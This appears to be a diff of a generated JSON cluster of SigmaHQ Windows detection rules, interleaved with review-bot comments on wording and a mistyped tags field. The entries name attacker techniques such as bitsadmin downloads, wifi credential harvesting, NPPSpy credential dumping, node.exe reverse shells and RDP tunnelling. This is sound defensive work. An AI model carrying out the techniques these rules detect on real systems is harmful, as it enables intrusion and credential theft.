+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN",
+ "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/",
+ "https://twitter.com/frack113/status/1555830623633375232",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml"
 ],
 "tags": [
 "attack.defense_evasion",
- "attack.t1562.004"
+ "attack.t1564.004"
 ]
 },
- "uuid": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c",
- "value": "Netsh Port or Application Allowed"
+ "uuid": "349d891d-fef0-4fe4-bc53-eee623a15969",
+ "value": "Use Short Name Path in Command Line"
 },
 {
- "description": "Detects Netsh commands that allows a suspcious application location on Windows Firewall",
+ "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n",
 "meta": {
- "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community",
- "creation_date": "2020/05/25",
+ "author": "frack113",
+ "creation_date": "2022/09/25",
 "falsepositive": [
- "Legitimate administration"
+ "Legitimate use"
 ],
- "filename": "proc_creation_win_netsh_fw_add_susp_image.yml",
+ "filename": "proc_creation_win_ultraviewer.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultraviewer.yml"
+ ],
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1219"
+ ]
+ },
+ "uuid": "88656cec-6c3b-487c-82c0-f73ebb805503",
+ "value": "Use of UltraViewer Remote Access Software"
+ },
+ {
+ "description": "Detect use of \"/R <\" to read and execute a file via cmd.exe",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/08/20",
+ "falsepositive": [
+ "Legitimate use"
+ ],
+ "filename": "proc_creation_win_cmd_read_contents.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_read_contents.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059.003"
+ ]
+ },
+ "uuid": "00a4bacd-6db4-46d5-9258-a7d5ebff4003",
+ "value": "Read and Execute a File Via Cmd.exe"
+ },
+ {
+ "description": "Detects usage of bitsadmin downloading a file with a suspicious extension",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/06/28",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_bitsadmin_download_susp_ext.yml",
 "level": "high",
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.virusradar.com/en/Win32_Kasidet.AD/description",
- "https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml"
+ "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
+ "https://isc.sans.edu/diary/22264",
+ "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ext.yml"
 ],
 "tags": [
 "attack.defense_evasion",
- "attack.t1562.004"
+ "attack.persistence",
+ "attack.t1197",
+ "attack.s0190",
+ "attack.t1036.003"
 ]
 },
- "uuid": "a35f5a72-f347-4e36-8895-9869b0d5fc6d",
- "value": "Netsh Program Allowed with Suspcious Location"
+ "uuid": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200",
+ "value": "Bitsadmin Download File with Suspicious Extension"
+ },
+ {
+ "description": "Detects usage of wmic to start or stop a service",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/06/20",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_wmic_service.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_service.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1047"
+ ]
+ },
+ "uuid": "0b7163dc-7eee-4960-af17-c0cd517f92da",
+ "value": "WMIC Service Start/Stop"
+ },
+ {
+ "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/08/02",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_susp_invoke_webrequest_download.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_invoke_webrequest_download.yml"
+ ],
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1105"
+ ]
+ },
+ "uuid": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc",
+ "value": "Suspicious Invoke-WebRequest Usage"
+ },
+ {
+ "description": "Detects the execution of reg.exe and subsequent command line arguments for enabling RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' subkeys",
+ "meta": {
+ "author": "@Kostastsale, @TheDFIRReport, slightly modified by pH-T",
+ "creation_date": "2022/02/12",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_reg_enable_rdp.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_enable_rdp.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.lateral_movement",
+ "attack.t1021.001",
+ "attack.t1112"
+ ]
+ },
+ "uuid": "0d5675be-bc88-4172-86d3-1e96a4476536",
+ "value": "Enabling RDP Service via Reg.exe"
 },
 {
 "description": "Detects the removal of a port or application rule in the Windows Firewall configuration using netsh",
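Review bot: The Invoke-WebRequest entry's description reads `where the and output is located in a suspicious location`, which has a stray word; the intended wording is presumably `where the output is located in a suspicious location`. The `filename` key and the SigmaHQ refs suggest this cluster is generated from the upstream rule files, so the wording should be corrected in the Sigma rule or the generator rather than by hand here, or it will be reverted on the next regeneration. The Hashcat entry has a similar wording problem: `Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against` describes an action rather than what the rule detects, and `Detects execution of Hashcat.exe with a SAM file and a password list` would read consistently with the other entries.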
@@ -43045,316 +36049,128 @@
 "value": "Netsh Firewall Rule Deletion"
 },
 {
- "description": "Adversaries may modify system firewalls in order to bypass controls limiting network usage",
+ "description": "Detects suspicious process that use escape characters",
 "meta": {
- "author": "frack113",
- "creation_date": "2022/01/09",
+ "author": "juju4",
+ "creation_date": "2018/12/11",
 "falsepositive": [
- "Legitimate administration"
+ "False positives depend on scripts and administrative tools used in the monitored environment"
 ],
- "filename": "proc_creation_win_netsh_fw_enable_group_rule.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall",
- "https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562.004"
- ]
- },
- "uuid": "347906f3-e207-4d18-ae5b-a9403d6bcdef",
- "value": "Netsh Allow Group Policy on Microsoft Defender Firewall"
- },
- {
- "description": "Detects capture a network trace via netsh.exe trace functionality",
- "meta": {
- "author": "Kutepov Anton, oscd.community",
- "creation_date": "2019/10/24",
- "falsepositive": [
- "Legitimate administrator or user uses netsh.exe trace functionality for legitimate reason"
- ],
- "filename": "proc_creation_win_netsh_packet_capture.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_packet_capture.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.credential_access",
- "attack.t1040"
- ]
- },
- "uuid": "d3c3861d-c504-4c77-ba55-224ba82d0118",
- "value": "Capture a Network Trace with netsh.exe"
- },
- {
- "description": "Detects netsh commands that configure a port forwarding (PortProxy)",
- "meta": {
- "author": "Florian Roth, omkar72, oscd.community",
- "creation_date": "2019/01/29",
- "falsepositive": [
- "Legitimate administration",
- "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)"
- ],
- "filename": "proc_creation_win_netsh_port_fwd.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html",
- "https://adepts.of0x.cc/netsh-portproxy-code/",
- "https://www.dfirnotes.net/portproxy_detection/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_fwd.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "attack.defense_evasion",
- "attack.command_and_control",
- "attack.t1090"
- ]
- },
- "uuid": "322ed9ec-fcab-4f67-9a34-e7c6aef43614",
- "value": "Netsh Port Forwarding"
- },
- {
- "description": "Detects netsh commands that configure a port forwarding of port 3389 used for RDP",
- "meta": {
- "author": "Florian Roth, oscd.community",
- "creation_date": "2019/01/29",
- "falsepositive": [
- "Legitimate administration"
- ],
- "filename": "proc_creation_win_netsh_port_fwd_3389.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_fwd_3389.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "attack.defense_evasion",
- "attack.command_and_control",
- "attack.t1090"
- ]
- },
- "uuid": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63",
- "value": "Netsh RDP Port Forwarding"
- },
- {
- "description": "Detect the harvesting of wifi credentials using netsh.exe",
- "meta": {
- "author": "Andreas Hunkeler (@Karneades), oscd.community",
- "creation_date": "2020/04/20",
- "falsepositive": [
- "Legitimate administrator or user uses netsh.exe wlan functionality for legitimate reason"
- ],
- "filename": "proc_creation_win_netsh_wifi_credential_harvesting.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.credential_access",
- "attack.t1040"
- ]
- },
- "uuid": "42b1a5b8-353f-4f10-b256-39de4467faff",
- "value": "Harvesting of Wifi Credentials Using netsh.exe"
- },
- {
- "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n",
- "meta": {
- "author": "frack113",
- "creation_date": "2022/09/25",
- "falsepositive": [
- "Legitimate use"
- ],
- "filename": "proc_creation_win_netsupport.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsupport.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1219"
- ]
- },
- "uuid": "758ff488-18d5-4cbe-8ec4-02b6285a434f",
- "value": "Use of NetSupport Remote Access Software"
- },
- {
- "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system",
- "meta": {
- "author": "frack113",
- "creation_date": "2022/03/12",
- "falsepositive": [
- "Legitimate script"
- ],
- "filename": "proc_creation_win_network_scan_loop.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md",
- "https://ss64.com/nt/for.html",
- "https://ss64.com/ps/foreach-object.htmll",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_network_scan_loop.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059",
- "attack.discovery",
- "attack.t1018"
- ]
- },
- "uuid": "f8ad2e2c-40b6-4117-84d7-20b89896ab23",
- "value": "Suspicious Scan Loop Network"
- },
- {
- "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.",
- "meta": {
- "author": "Timur Zinniatullin, oscd.community",
- "creation_date": "2019/10/21",
- "falsepositive": [
- "Admin activity"
- ],
- "filename": "proc_creation_win_network_sniffing.yml",
+ "filename": "proc_creation_win_susp_cli_escape.yml",
 "level": "low",
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_network_sniffing.yml"
+ "http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/",
+ "https://twitter.com/vysecurity/status/885545634958385153",
+ "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html",
+ "https://twitter.com/Hexacorn/status/885570278637678592",
+ "https://twitter.com/Hexacorn/status/885553465417756673",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cli_escape.yml"
 ],
 "tags": [
- "attack.credential_access",
- "attack.discovery",
- "attack.t1040"
+ "attack.defense_evasion",
+ "attack.t1140"
 ]
 },
- "uuid": "ba1f7802-adc7-48b4-9ecb-81e227fddfd5",
- "value": "Network Sniffing"
+ "uuid": "f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd",
+ "value": "Suspicious Commandline Escape"
 },
 {
- "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc",
+ "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files to download arbitrary files",
 "meta": {
 "author": "Nasreddine Bencherchali",
- "creation_date": "2022/09/01",
+ "creation_date": "2022/08/19",
 "falsepositive": [
- "Some fasle positives could occure with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium"
+ "Unknown"
 ],
- "filename": "proc_creation_win_net_default_accounts_manipulation.yml",
+ "filename": "proc_creation_win_lolbin_presentationhost_download.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/LOLBAS-Project/LOLBAS/pull/239/files",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.execution",
+ "attack.t1218"
+ ]
+ },
+ "uuid": "b124ddf4-778d-418e-907f-6dd3fc0d31cd",
+ "value": "Download Arbitrary Files Via PresentationHost.exe"
+ },
+ {
+ "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)",
+ "meta": {
+ "author": "Max Altgelt",
+ "creation_date": "2021/12/09",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_susp_image_missing.yml",
 "level": "high",
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html",
- "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/",
- "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml"
+ "https://pentestlaboratories.com/2021/12/08/process-ghosting/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml"
 ],
 "tags": [
- "attack.collection",
- "attack.t1560.001"
+ "attack.defense_evasion"
 ]
 },
- "uuid": "5b768e71-86f2-4879-b448-81061cbae951",
- "value": "Suspicious Manipulation Of Default Accounts"
+ "uuid": "71158e3f-df67-472b-930e-7d287acaa3e1",
+ "value": "Execution Of Non-Existing File"
 },
 {
- "description": "Identifies attempts to enumerate hosts in a network using the built-in Windows net.exe tool.",
+ "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff",
 "meta": {
- "author": "Endgame, JHasenbusch (ported for oscd.community)",
- "creation_date": "2018/10/30",
+ "author": "Florian Roth",
+ "creation_date": "2022/10/10",
 "falsepositive": [
- "Legitimate use of net.exe utility by legitimate user"
+ "Sometimes used by developers or system administrators for debugging purposes"
 ],
- "filename": "proc_creation_win_net_enum.yml",
- "level": "low",
+ "filename": "proc_creation_win_susp_process_hacker.yml",
+ "level": "high",
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://eqllib.readthedocs.io/en/latest/analytics/b8a94d2f-dc75-4630-9d73-1edc6bd26fff.html",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_enum.yml"
+ "https://processhacker.sourceforge.io/",
+ "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/",
+ "https://github.com/winsiderss/systeminformer",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_process_hacker.yml"
 ],
- "tags": [
- "attack.discovery",
- "attack.t1018"
- ]
+ "tags": "No established tags"
 },
- "uuid": "62510e69-616b-4078-b371-847da438cc03",
- "value": "Windows Network Enumeration"
+ "uuid": "811e0002-b13b-4a15-9d00-a613fce66e42",
+ "value": "Process Hacker / System Informer Usage"
 },
 {
- "description": "Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE",
+ "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level",
 "meta": {
- "author": "Florian Roth, omkar72, @svch0st, Nasreddine Bencherchali",
- "creation_date": "2019/01/16",
+ "author": "Teymur Kheirkhabarov",
+ "creation_date": "2019/10/26",
 "falsepositive": [
- "Inventory tool runs",
- "Administrative activity"
+ "Unknown"
 ],
- "filename": "proc_creation_win_net_recon.yml",
- "level": "medium",
+ "filename": "proc_creation_win_possible_privilege_escalation_via_service_reg_perm.yml",
+ "level": "high",
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/",
- "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
- "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_recon.yml"
+ "https://pentestlab.blog/2017/03/31/insecure-registry-permissions/",
+ "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_possible_privilege_escalation_via_service_reg_perm.yml"
 ],
 "tags": [
- "attack.discovery",
- "attack.t1087.001",
- "attack.t1087.002"
+ "attack.privilege_escalation",
+ "attack.t1574.011"
 ]
 },
- "uuid": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0",
- "value": "Suspicious Reconnaissance Activity Using Net"
- },
- {
- "description": "Identifies creation of local users via the net.exe command.",
- "meta": {
- "author": "Endgame, JHasenbusch (adapted to Sigma for oscd.community)",
- "creation_date": "2018/10/30",
- "falsepositive": [
- "Legitimate user creation.",
- "Better use event IDs for user creation rather than command line rules."
- ],
- "filename": "proc_creation_win_net_user_add.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1136.001"
- ]
- },
- "uuid": "cd219ff3-fa99-45d4-8380-a7d15116c6dc",
- "value": "Net.exe User Account Creation"
+ "uuid": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981",
+ "value": "Possible Privilege Escalation via Service Permissions Weakness"
 },
 {
 "description": "Detects creation of local users via the net.exe command with the option \"never expire\"",
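Review bot: `"tags": "No established tags"` in the Process Hacker / System Informer entry is a string, while `meta.tags` is an array in every other entry visible in this hunk and the previous ones; a consumer that iterates `meta.tags` to map entries to ATT&CK techniques will either fail on this entry or iterate the characters of the sentinel. For a rule with no tags the key should be `"tags": []` or omitted, so the type of the field stays stable across the file. The sentinel looks like a generator fallback rather than a hand edit, so it is worth fixing in the generator and checking the rest of the regenerated file for further occurrences, since only this hunk's instance is visible here.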
@@ -43381,505 +36197,908 @@ "value": "Net.exe User Account Creation - Never Expire" }, { - "description": "Detects when an admin share is mounted using net.exe", - "meta": { - "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga", - "creation_date": "2020/10/05", - "falsepositive": [ - "Administrators" - ], - "filename": "proc_creation_win_net_use_admin_share.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_use_admin_share.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ] - }, - "uuid": "3abd6094-7027-475f-9630-8ab9be7b9725", - "value": "Mounted Windows Admin Shares with net.exe" - }, - { - "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/23", - "falsepositive": [ - "Other legitimate network providers used and not filtred in this rule" - ], - "filename": "proc_creation_win_new_network_provider.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade", - "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_new_network_provider.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003" - ] - }, - "uuid": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", - "value": "New Network Provider - CommandLine" - }, - { - "description": "Detects creation of a new service.", - "meta": { - 
"author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", - "creation_date": "2019/10/21", - "falsepositive": [ - "Legitimate administrator or user creates a service for legitimate reasons." - ], - "filename": "proc_creation_win_new_service_creation.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_new_service_creation.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ] - }, - "uuid": "7fe71fc9-de3b-432a-8d57-8c809efc10ab", - "value": "New Service Creation" - }, - { - "description": "Detects usage of nimgrab, a tool bundled with the Nim programming framework, downloading a file. This can be normal behaviour on developer systems.", - "meta": { - "author": "frack113", - "creation_date": "2022/08/28", - "falsepositive": [ - "Legitimate use of Nim on developer systems" - ], - "filename": "proc_creation_win_nimgrab.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nimgrab.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "74a12f18-505c-4114-8d0b-8448dd5485c6", - "value": "Nimgrab File Download" - }, - { - "description": "Detects nltest commands that can be used for information discovery", - "meta": { - "author": "Craig Young, oscd.community, Georg Lauenstein", - "creation_date": "2021/07/24", - "falsepositive": [ - "Legitimate administration use but user must be check out" - ], - "filename": 
"proc_creation_win_nltest_recon.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)", - "https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/", - "https://attack.mitre.org/techniques/T1482/", - "https://attack.mitre.org/techniques/T1016/", - "https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters", - "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nltest_recon.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1016", - "attack.t1482" - ] - }, - "uuid": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", - "value": "Recon Activity with NLTEST" - }, - { - "description": "Detects the execution node.exe which is shipped with multiple softwares such as VMware, Adobe...etc. In order to execute arbitrary code. 
For example to establish reverse shell as seen in Log4j attacks...etc", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/09", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_node_abuse.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return", - "https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/", - "https://nodejs.org/api/cli.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_node_abuse.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ] - }, - "uuid": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", - "value": "Node.exe Process Abuse" - }, - { - "description": "Detects non-interactive PowerShell activity by looking at powershell.exe with not explorer.exe as a parent.", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)", - "creation_date": "2019/09/12", - "falsepositive": [ - "Legitimate programs executing PowerShell scripts" - ], - "filename": "proc_creation_win_non_interactive_powershell.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_non_interactive_powershell.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "f4bbd493-b796-416e-bbf2-121235348529", - "value": "Non Interactive PowerShell" - }, - { - "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", - "meta": { - "author": "Teymur 
